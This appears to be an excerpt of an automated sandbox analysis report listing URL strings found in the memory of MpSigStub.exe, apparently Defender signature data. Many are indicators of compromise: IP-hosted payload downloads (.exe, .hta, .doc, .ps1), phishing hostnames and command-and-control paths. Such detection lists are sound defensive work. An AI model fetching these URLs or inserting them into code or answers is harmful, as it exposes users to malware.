Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp String found in binary or memory: http://%s/search/search.cgi?s
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://%s/search/search.cgi?src=autosearch&s=%s
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://%s/support.php
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp String found in binary or memory: http://%s/sync.php
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://%s:%d/%s%d%08dindex.asp?ToDowbSVCHOST.EXErbSeDe
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://%s:%d/%s%d%sindex.asp?%u%dOEMCP
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://%s:%d/%sPOSTid=41.php?
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://%s:%d/index.cgi
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://%s:%s/bks.asp
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://%sMozilla/4.0
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://(.-/)
Source: MpSigStub.exe, 00000023.00000003.18301236868.0000015B1B97A000.00000004.00000001.sdmp String found in binary or memory: http://.(www.blackcheta.blogspot.com/)
Source: MpSigStub.exe, 00000023.00000003.18320569449.0000015B1B556000.00000004.00000001.sdmp String found in binary or memory: http://.exeuser32.dll
Source: MpSigStub.exe, 00000023.00000003.18242976274.0000015B0B50C000.00000004.00000001.sdmp String found in binary or memory: http://.ocx.cabhtml:file:ftp://
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://.online/a
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://.zdropp.co.cc/download.php?token=
Source: MpSigStub.exe, 00000023.00000003.18301236868.0000015B1B97A000.00000004.00000001.sdmp String found in binary or memory: http://0-2-t-9-r-6-p-4-4-4-s-0-h-e-.i-k-r-g-1-0-u-5-1-f-3-g-li-9-p-1-x-t-6-g-l-8-m-q-y-s-k-6-l.info
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://0.82211.net/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://00.1.00.2.1.11.9.online.secured.adobe.protected.file.version.9.8.online.verification.access.v
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://0147.0131.0133.0174/..----------------------....................-.....................-/.....
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp String found in binary or memory: http://03ptc6fk0.ru/clogs/index.php?
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://0c00.cc/0c_data.cc
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://0d91.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://0vyk.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://1-0-9.cn/zxc/index.htm
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://10.24.13.102/office.png
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://103.133.106.72/ini/................wbk
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://103.140.251.93/_....-------------------------.....------------_----/
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://103.149.12.183/bigi.doc
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://103.149.12.183/p1.doc
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp String found in binary or memory: http://103.149.12.183/u1.doc
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://103.213.245.135/n.hta
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://103.49.146.132/OpenCL.dll
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://103.49.146.132/cpu_tromp_AVX.dll
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://103.49.146.132/cpu_tromp_SSE2.dll
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://103.49.146.132/cudart32_80.dll
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://103.49.146.132/svchost.exe
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://104.153.45.242/~cimbonli//wp-content/upload/ken.exe
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://104.236.94.
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://104.243.35.43
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://107.170.47.94/mdsatalho/
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://107.172.130.145/
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://107.173.219.115:4560/press1.exe
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://107.173.219.80/-.............................................................................
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: http://107.189.10.150/ht/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://108.61.208.60
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://109.248.148.42/officedocument/2006/relationships/templates.dotm
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://110.34.232.11:1314
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://110.42.4.180:
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://112.164.188.12/hza.html
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://114.108.151.148/lib/lib.asp
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://116.37.147.205/hit.php
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://118.184.48.95:8000/info
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://119.249.54.113/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://119.92.89.144/tmp/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://120.125.201.101/logo/
Source: MpSigStub.exe, 00000023.00000003.18334799670.0000015B1A704000.00000004.00000001.sdmp String found in binary or memory: http://120061996-783405463700123057.preview.editmysite.com/uploads/1/2/0
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://121.14.
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://122.228.228.7
Source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: http://123support.online/
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://123zphimonline.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1/down/list2.txt
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1/m.htmwidth=0height=0
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1/tracking?source=
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:20202/remind.html
Source: MpSigStub.exe, 00000023.00000003.18300585182.0000015B1A681000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:27777/?inj=http://
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:5
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:5555/
Source: MpSigStub.exe, 00000023.00000003.18304719860.0000015B1B7EB000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8000/web.html?url=yac.mx&rate=501&id=%s&key=%s&pm=1x
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8081/dial.html?
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8089/index.html?
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8332
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8545
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:9600/IperiusHSa
Source: RegAsm.exe, 00000008.00000002.21904007601.000000001E471000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://13.233.183.227/de/lngukm2012920/bestellungen/zahlung
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://131.153.38.125/
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://134.249.116.78/cloud.php/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://139.162.
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://144.217.14.173/doc.doc
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://149.20.4.69
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://149.202.110.58/document_012001.doc
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://149.3.170.235/qw-fad/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://151.248.115.253/%sproc0%%sproc0%exit
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://152.89.218.86/
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://155.138.254.3/ok.js
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://158.255.1.137/1/live.php
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://158.255.5.220
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp String found in binary or memory: http://159.8.31.231/
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: http://164.132.171.89/promo.php
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://165.227.7.138/index.hta
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://167.114.35.111/~miraclen/sul2/sul2.exe
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://169.54.172.92/coreslibri.zip
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://170.130.55.135/api.php
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://172.16.1.1/exm.rtf
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://172.245.119.81/.----------------------.------------------------------.-/s.wbk
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://172.98.73.57
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://173.201.215.95/depmex/xhi05bs8.php?id=2809310
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://173.208.139.170/s.txt
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://178.128.11.199/qtx.
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://178.62.19.66/campo/v/v
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp String found in binary or memory: http://178.79.137.25/campo/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://179.43.158.187/PhtJFr0fvBk2.php
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://181.174.166.137/sys/f4.exe
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp String found in binary or memory: http://184.105.163.238/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://185.14.30.131/api.php
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://185.14.31.93/nuzq5lag7htb.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://185.141.25.168/check_attack/
Source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp String found in binary or memory: http://185.153.198.216:8010/UserService
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://185.165.29.36/11.mov
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://185.165.30.31
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://185.172.110.217/kvsn/image.png
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://185.172.110.217/robx/remit.jpg
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://185.180.197.66/2vjdz6jaqzeiq.php
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://185.183.98.14/fontsupdate.php
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://185.185.25.175/ref45.php
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/prey.dot
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://185.225.19.240/dmenconsvc.dll
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://185.236.231.209/xcel/copy/xel.phpmethod=post
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://185.236.231.210/test/en/dsf.php
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://185.239.242.71
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://185.243.215.213/sys_info.vbs
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://185.250.149.128/
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://185.38.142.91/awo/
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://185.38.142.91/awo/next.php
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://185.82.218.2/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://185.82.218.30/44313
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://185.99.2.83/frte1z0xiwu8q.php
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://187.157.146.147/m0rpheus/index.php?mon=
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://188.127.254.159/
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://188.166.41.131/momo.php
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://189.1.168.10/~festaefe/1024bit.php
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://190.14.37.190/
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: http://190.14.37.191/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://191.101.239.86/root/migytkyt5bberd
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://192.168.0.108/download.ps1
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://192.168.1.60/6464.exe
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: http://192.168.100.5/00ButtonTest.exe
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://192.168.213.131/logo.doc
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://192.168.88.
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://192.189.25.17/cgbin/ukbros
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://192.227.228.85/.--...........................................................................
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://192.236.147.189/execute/uploads/Excel.sct
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://192.3.141.134/document_m.doc
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://192.3.141.173/word/
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://192.3.152.134/nda/document.doc
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://192.3.22.5/.-................................................................................
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://193.107.19.250:89/users/gigi_eli/ax.php
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://193.203.202.55/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://193.38.55.92/gfmppbpq
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://194.145.227.21sys=$(date
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://194.178.112.202
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://194.5.249.101/api.php
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://194.5.249.107/2nquxqz2ok4a45l.php
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://195.123.210.174/
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://195.123.219.21/campo/t3/t3d
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://195.123.220.249/campo/t2/t2dcdddebp%&c
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://195.123.235.1/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://195.225.176.34/ad/
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://195.226.220.112/~admin/.
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://195.5.116.250/ex/static.php
Source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp String found in binary or memory: http://195.78.108.
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://195.95.218.173/dl/dl.php?
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://195.95.218.173/troys/
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://198.12.127.217/.--------------------------.--------------........-...................-/_.....
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://198.23.212.187/_......................................_......................-/
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: http://198.23.213.25/document.doc
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://198.23.251.121/_--_-_---_-_--__------_.......................................................
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://198.46.132.185/.--_------------------------------------------.-----/
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://198.46.201.115/.-...................................................-.-/..-------------------
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp String found in binary or memory: http://198.50.114.16
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://1animalsnames.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://1bestgate.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://1lxtjdias-pod:8080/stage3.exe
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://200.159.128.
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://200.63.45.105/duiss/duiss
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://200.63.45.105/sado/sado.exe
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://200.74.240.151/saturno/w7.txt
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://200.74.240.151/saturno/w8.txt
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://200.98.142.117/sys02/01.exe
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://2010-kpss.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://2012-wallpaper-hd.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://2014secimleriturkiye.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://202.104.11.94
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://203.199.200.61
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://205.177.124.74/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://205.185.116.78/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/FQL66n
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/b9xbb3
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/files/may13.bin
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/khkwZF
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://205.185.125.104/1t1nnx
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: http://205.185.125.104/pqbtwj
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: http://205.185.125.104/yxsz8k
